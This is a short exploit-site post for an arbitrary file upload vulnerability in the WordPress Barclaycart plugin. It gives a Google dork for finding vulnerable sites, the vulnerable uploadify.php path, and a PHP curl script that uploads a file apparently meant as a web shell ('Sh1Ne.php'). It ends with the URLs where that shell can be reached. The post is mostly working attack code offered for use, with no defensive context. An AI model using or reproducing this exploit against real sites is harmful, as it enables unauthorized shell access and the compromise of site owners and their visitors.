1337mir.com
WP Barclaycart Plugins Arbitrary File Upload Vulnerability - 1337 MiR
exploit title: WP Barclaycart Plugins Arbitrary File Upload Vulnerability Author: eX-Sh1Ne Author Facebook: www.fb.me/ShiNe.gov Date: 03-2014 GoogleDork: inurl:”wp-content/plugins/barclaycart” Vulnerable location: wp-content/plugins/barclaycart/uploadify/uploadify.php Exploit : < -?- php $uploadfile="Sh1Ne.php"; $ch = curl_init("http://127.0.0.1/wp-content/plugins/barclaycart/uploadify/uploadify.php"); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, array('Filedata'=>“@$uploadfile”, ‘folder’=>’/wp-content/plugins/barclaycart/uploadify/’)); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $postResult = curl_exec($ch); curl_close($ch); print “$postResult”; – ? -> Shell Access : http://localhost/wp-content/plugins/barclaycart/uploadify/Sh1Ne.php or http://localhost/wp-content/uploads/[years]/[month]/